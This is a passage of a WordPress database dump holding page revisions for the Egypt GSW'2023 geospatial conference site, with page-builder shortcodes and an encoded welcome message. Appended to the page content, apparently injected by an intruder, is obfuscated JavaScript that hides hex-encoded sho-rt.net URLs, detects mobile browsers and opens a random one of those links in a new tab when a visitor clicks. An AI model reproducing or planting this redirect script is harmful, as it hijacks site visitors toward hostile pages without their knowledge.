_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-19 16:25:27','2022-10-19 16:25:27','',2167,'https://gsw2023.com/?p=2910',0,'revision','',0),
(2911,1,'2022-10-20 11:26:35','2022-10-20 11:26:35','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column width=\"2/3\"][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][vc_column width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const 